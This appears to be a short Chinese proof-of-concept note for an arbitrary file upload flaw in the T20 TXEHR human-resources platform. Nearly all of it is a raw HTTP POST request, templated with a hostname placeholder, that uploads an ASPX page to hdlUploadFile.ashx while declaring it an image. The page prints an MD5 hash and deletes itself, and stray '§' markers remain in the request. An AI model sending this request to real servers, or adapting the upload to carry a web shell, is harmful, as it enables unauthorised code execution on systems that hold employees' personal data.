T20-2同享TXEHR-人力管理管理平台-任意文件上传

漏洞复现：

payload：

POST /MobileService/Web/Handler/hdlUploadFile.ashx?puser=.//Style/abcd HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
      Accept: */*
      §Content-Type: multipart/form-data; boundary=---------------------------45250802924973458471174811279
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
      Accept-Encoding: gzip, deflate

      -----------------------------45250802924973458471174811279
      Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
      Content-Type: image/png

      <%@ Page Language="C#"%>
      <%
      Response.Write(FormsAuthentication.HashPasswordForStoringInConfigFile("123456", "MD5"));
      System.IO.File.Delete(Request.PhysicalPath);
      %>
      -----------------------------45250802924973458471174811279§